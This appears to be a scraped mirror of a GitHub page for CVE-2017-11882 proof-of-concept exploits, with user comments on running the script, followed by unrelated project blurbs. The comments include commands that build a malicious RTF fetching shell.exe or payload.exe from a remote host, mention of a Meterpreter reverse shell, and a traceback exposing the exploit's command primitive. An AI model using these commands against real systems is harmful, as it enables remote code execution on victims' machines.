embedi / cve-2017-11882 Goto Github PK
View Code? Open in Web Editor NEWProof-of-Concept exploits for CVE-2017-11882
Proof-of-Concept exploits for CVE-2017-11882
Greetings. It appears that in order for this script to work(for me), I had to supply the following arguments to the script: python webdav_exec_CVE-2017-11882.py -u \\\\192.168.x.x\\webdav -e \\\\192.168.x.x\\webdav\\shell.exe -o text.rtf
. Otherwise, if I did this: python webdav_exec_CVE-2017-11882.py -u \\192.168.x.x\webdav -e \\192.168.x.x\webdav\shell.exe -o text.rtf
, I would get an error from Word saying could not find resource from \192.168.x.xwebdav
. It appears that the python script, on my end, needed the backslash character to escape the backslash. I was able to weaponize (I think) this exploit using Meterpreter's handler and a Meterpreter reverse tcp payload. However, when I enter the WebDAV path in Windows using win+R, Windows somehow opens ups the webdav location in explorer before the meterpreter session could be established. Is anyone else or you experiencing this? Is this normal behavior?
As Desig Science licenced their reduced equation editor not only to microsoft, but to other vendor's, the question arrises if their equation editor is also vulnerable.
Is there a simple way to be sure?
In order to name just a few:
XP Tech Equation 2
SoftMaker Formeleditor
Corel Equation 2.0
GRAMS Equation 2.1
Sakbr Software Equation 2.1
Hi
can you please explain how to to use this POC
i tried many ways it's not working
i mean with real payload not calc.exe
python webdav_exec_CVE-2017-11882.py -u http://192.168.1.166/payload.exe -e payload.exe -o test.rtf
but it's show me error
Traceback (most recent call last):
File "webdav_exec_CVE-2017-11882.py", line 152, in
rtf_content = create_rtf(RTF_HEADER, RTF_TRAILER, args.url, args.executable)
File "webdav_exec_CVE-2017-11882.py", line 137, in create_rtf
ole1 = create_ole_exec_primitive("cmd.exe /c start " + remote_location + " &")
File "webdav_exec_CVE-2017-11882.py", line 129, in create_ole_exec_primitive
raise ValueError("primitive command must be shorter than 43 bytes")
ValueError: primitive command must be shorter than 43 bytes
Thanks
can I edit in the ole data ?
What should this data be to exploit the vulnerability and how to know the offest of the command that will be executed
Why is the maximum size of the request equal to 43?
How to increase its size?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.